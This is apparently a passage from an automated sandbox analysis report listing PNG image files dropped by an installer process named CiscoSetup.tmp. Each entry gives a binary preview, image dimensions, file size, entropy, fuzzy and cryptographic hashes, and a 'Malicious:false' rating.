                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x....B.R .w4..-.p-b..o".....`U.R+.+..=..<....J.b...."..U...ATD.....R....G. ..Nf.k.^k..k.%........3..o}..T...y........Pkt......r..wj_.~z...^....l|2....L._...>.I.../..^...N.6.$...:Q.N.iK.........V...X%N&.[Q.-c'....W.p,~U..-...S.....N.z~.w. .....;..<..>.?..._oK....w......3..[U[.....o.?..U.>.[...lR...D...u.w.../n.Y...{.x8O...M,......;.d<..1.._7).D&`.....N..3jx.g.S.[....N.n#..^?H...x.'.^}.i......_H.....I~1..;.S....;;.......x.w...............~@oly.;....F..]...i.?.P.6m..Q...#%.%...$<.p..W]...'.A....._uL;.o......_~.>........L..O.}..b....I.Gae.n....U..Y.6m.....+.-4.;.].............p...A..g.../...N..+(.$...n..S..&.....\z...]..y..v...?[...=.NZ.\.*...#.J***f.q`#..*H..W.45.V.{...G..<IT..'K.f*;Q.Vz.....u7.W";AT....1.-_.$.'d...-.<.c^o%::..L.%N<.+sLVc,.q.^'..i5&*/.6.....i*...Y.N......4$.!(...p1..6U..._.8....#{g.A..@.R.#..)........i............ ..F..S.......Qf.~..u..9......M..cN:.7F'..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx............`....L)VT.U..Id.`*....jt.$.M...`m.........+.T4..8.....d3...^..R1.Q.K.5+. [.....sN..}.q.._...........$+.D..Rm.O..`./..=..?"........n..(.T.6.I.......sg|......K............x...p'.V.....6.........w..d..v...S.Yiu ..xf..*..!7."t.0........F.;u...3.y...........\...Yy..g...w...........=..J{.7..G.<..>..I."........Lwv..s..V..[.;.v0v...].....o............'..e....9=....?(........g~~O.@*..........|<.A..t..o.....f......K.z.'...}F*p.... ..9x.......U...e..m..;...R.@x..^...Mas.Y.=.?\..{.us.. .Z.o:..L..q.Q.>.?.........1ET..5.|....`.P...AF6_.R|.=.{......B......w..s..k.%3.....3R....3H....&._1.L8.,ydq;y.c....6..7B..+.8..l.'=HR...Y.!j..<...=.>.<.x .w..M..._,.x0....q.,.LB. ....6.yxh....\B._..\..E..k..}..o}....[.6/...0z1.......v.D.s3..L.LV..%.MJ$;P.v.\.=..L...J..$......./....H.....x^.m...l/-.....<.-,..e..cD...;>g....0..Z...n..@.0BZ.3..x......,.9..?}.....d.....H...#_.....S2QZ.._
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10710
                                                                                                                                                                                                  Entropy (8bit):7.9641316394298025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                                                                                  MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                                                                                  SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                                                                                  SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                                                                                  SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx..]{..U._<..Th.CK=..R..V.GOWH.G3"8.5L.....;b............3.:S....s=....G].vX.w....W....Z?.^{..k..{.........w}...%y`...]...B6..........K.S..j.G."..?>.c..~../(/&}................p..B~..7...t.\... .j......,.......;.]M......`.o.p..?...98.c.%.6.....g...&.............;..F..!.fL%/.j@:.`.o....5_.b2...5|h...UoI/....W..W...}.....<.<\0.p.N.,Y......M...KI.O"C.x.}$.....=.V...E.........HT....Ep.m.~.[(....Y.f.'g*_...NG..S....m.2.<..[.(G.m..[.1....S........|...[.o.#eW....F.-.a.+...^.Rp...L.ue.<+./.......?..Lke.b.r.....V..G...$..6.]:.s...+..F...#O....=Y.;..g..l..,c....DWw.hB....B..l...`..;".wV.#..{.q.........v.].Z..C...T.`.-}M#...........{.(t.E.Om. ..=My..V...4.\.Ep.........W.)..x.W..f..7{.IG..-.....Z..{.l..F.,..f^r...V.9..H../.....$.&>..U...Msx.68.....S{...Z....v..v....O,.ps2E.......>..M_.........6H.hl.;Q.d....h.H...V..W...iH..{..2Q.zmp..;.Z~].c.!.Y.}.6.P......^kC..t...V.0.^.l.NMp..o..Y.8...Q
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12252
                                                                                                                                                                                                  Entropy (8bit):7.977665916091742
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                                                                                  MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                                                                                  SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                                                                                  SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                                                                                  SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....&......!.O....Z.(.....[p....w...X.Hp.uKp...&.+V.....A/.S[.l.....j.}...b$...M..gf.9..;7......;3g......)WH.]...*.>.y..t......6.O'N..8.#.v<..Kv........y....;q.....(..mG..8]..G...]...."l>........vd.C.....nHp...v!....Ks^?I.T..1%.U..s/...+.I.{Yv.2."/...`.p.........1?8L."lDo.e...O/..~..[..o..>. .o....-.=.]h.g.Y.......F.4g..../..x.......C.?..#...%.2...PNz...............-...i..8}.e?.......]~... *.......t..l...FD.g`........3g\I.,ZD.7.+.....:7.6....J.T*.?.f".....8.X.:2.j?......LK..G....h..l[...v|...9.[p.6.<....$....\...^.o....Ti../.{.HQ.ID...o.jl.A..(......./...".6.'..V.....T....~...I....,t..Hh.zT.G...njG&...7.MIE.g....../S...i,..Z..D*.D._..H. ..3......Y.*.2...O.........&.......)?...%.c.........eG.o..I,.N....wI..[:......./..+B..$..]l._..T..2<....;.v.~5t.I/..?..=..&.....U....L...L.....|...0...w.....V....*-.x.D..8...K/.d)......kj."......g*wo}\V.Q..8.).....?'..wP..?5A....K.1?8...e.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx....]E......m..Z.o....AZ.n(>V.")1.-F.....m...l...b\.@....E..|....*..'%.RA)...+.e.}.%..T6....3sf.s.s....{.;.7..7..)..i..i...~...?L.v....o.h..|..@<..vR.....ILO ...N..<'a.N......N..bs..!..<,c...}b..U]...../.L...=Enx......V.3.}r.)o.u..|...+g.Hu.*.....k..[.$&z...G#o....o.W.`w.T.5..~=..........V..;..$`.......=zf..Di_....D...r......W].}":..w|...=.._.s.2`r.8!.l.|o.......;hzy..n.s.0..+?3l>....Q5=..:6....L.<.l..x.......{.O.mx..R..i..$...\....#..^7Q.>C..........$..`.=...*...~....oc.e?._q......c}.......G.'.=....<..!X5.....=.8........N@..1c.Q.....5.A.]...)....t7B.......=.V...vn...cGNbr...s.1w...g[....e.6U..{..\...N"......0:....WirR.IL.d...JQ..9.....^/.......Gb/>...z...M-..2......(1. ..$.g..Y..'N... .-)...2...S.M.%......$;.X..R..C..m.m'.|wK...4[..`.....!..o.....,..u..4...._}.....l.O...3.mn..Y..m..M..Q.9..Y...N...!K.?.D..........!....x{d..=...T4.i.M.;.NGf...^.s.....T_&.%...7..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12436
                                                                                                                                                                                                  Entropy (8bit):7.977312501768235
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                                                                                  MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                                                                                  SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                                                                                  SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                                                                                  SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.xV...c....../\..T..@.....T.`.d....H.H..^F.@...!.X.x.PqP..{4...4.F.I.......2....".?...f......._...?.u.....}$,$..._TZH.9H..q....5...[.[T.#=.=..._...s..R.0Or..5eCl...g..e7.+z?eE........6.~.";.y....W.(?...Wf:P..gI.<b.Lr..Qd..........\.A......t.`,._...u...`/.........!.{...T./...........+....>C......8.....[.. ...WNQ~.;v..3...b5.l...*\~....+R....+.. ........`..........{;v.|Ry..x..UQ.&..%..$....>s......../..2..\T..Y..G#......x....W\.DT[.....v},]I.Vr.m.....x.......1.cu.D...bO:...6...,[\)=....,o..o.a.(.".....&.D.......=x..*.P&.........".}z+/_..X`etu..J......1....A..;...B...{.....M./Vb....v.T.a..3.....k.....T..JC.u....`.[..(R..........{..4R...B.8...vE...}w5...[.....F...3pTU{k.Bz.L....-T...T..?......|Py0..&.J.|...........{"..3pT.V.r...PH..R..M5V..AB.8...R..A.\......(3.p;..\.h.m....p..Q..'ok...O.6.$.....g...J...0...?O.~[[.),,4..N.......M.....cb.jT.JU.e..........1..({DW....K.*,=..!..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.tT..7>rk.....I...R.....6D../...T@..._.A[..$rkA.D..U0......W.EI..(...^.TC.TX>...eD......>{.>g...d~k.Jf....;....G.BB.<y..#N.6.i}......#.~......G.~......s..~...5..V...N......'.=..$.........K..a{.c.........:...3.....:.L...KWu.{.._..../<.Z...n.y..../.e{.i.3.......[.O`|..h.+../........M#._....s..G.3hO....j.._&..?...s=.<._\~I/..9....W..I.....u.tq..}..7.G;....h........f.G.v.h<....c...7.0.1....d[...^.......D"1....[.ilC..=@.6.U.O0.......P.......D.t..K..}.6M._*.....6._:h.'.Ix.htP..l.N.4.........$.m.......:........+..o<.../Ly]..p.....+...y.._.........t..........7..g...D..Y..A.........n.....9.....D."j.9....>]p.ly...........N.<....IaT..N'S..'..4.Nd.ntN........;..<d;..^..:...0...m.?).....Q..X.`).......%....!...........'..'...M2M.?..D..3{_[....jdpY.tW.i.....5Wep......Jj7....IJ....g.?M..).\}Bkc]....~u...~...w......!.x..w.......;)~NL...L.;wN............\j.[.N.Dt...EB.c:.....b..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9482
                                                                                                                                                                                                  Entropy (8bit):7.969513879342907
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:LXNXFLy+vMbgQbCoVANBzT84c2blwwjla7:rNX5ggQOoVIzwHwxA
                                                                                                                                                                                                  MD5:21841588532E34397E478E791A064F2C
                                                                                                                                                                                                  SHA1:90C0BEAC3D3A1288FB7BED658835BB6710E67922
                                                                                                                                                                                                  SHA-256:9D0F626E21D3324BE7CB473D44514737D9A9145B86E73F67EBFD6DE308B36FCC
                                                                                                                                                                                                  SHA-512:B0006DD98C201AD06F79166FD53F67C61C60C48C1506153EA47AB7F38A7D4F6CCACDF9E369AC0EFAD36B396786EDFD1FBEF8302D1F2B1F82BE6D784936ED6CB0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............5..6....pHYs...#...#.x.?v.. .IDATx..ml]......$..B.^..R.BI.mPB..i..B.I.D*.B...i...b7M...B...TI.CU..K..*.6%.\.5...T.....B.iU....U...x.d..y=g.9...dp..{.s.y^.y!e.1....z..BN...........[.~..X......Q.PO.w.!......k.d.M........x....y....<....O.oe.o."<...d..f.&2..".....(..{..}..C....]y..).xq.]...7....M....{......:'..'^.......9..0.._..~....#3.^M.t.0.....................\v].3.b.....ONz{.._..........m_..\..5W.buE...q..>...xE.+qA{E>^._.....f(...p5..s.fgI............_.z./.+V.>N.....D..). .q..9..!..9#..-(...^...G...].E.l.>..2...o..t/"C...x.\........u/ S|R..)-WMK..1..\..{..&..w..V.^...U8_A(l...Jp.....y.#..b{5:...F0-..N.c..ne..5....&.Kf(j7O....../0..N.[K.#Q|.K..cfjb;..N.....8.{....n#.j.O...Z._;.m.jWfp~.............. .w.}.<....\1X?+..4bi]..H)../.".....f.&N^......8..S..]...3..Cn..z]l.,........_...ek.e.F.-w?....i..i.B&./..........>.|r...Ii!....Q...t2._..HHCBx..B...<?35.J.....V/..s-...[..k..V.v.a.50..teS..w`fjbm....qC.....;89+!/@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
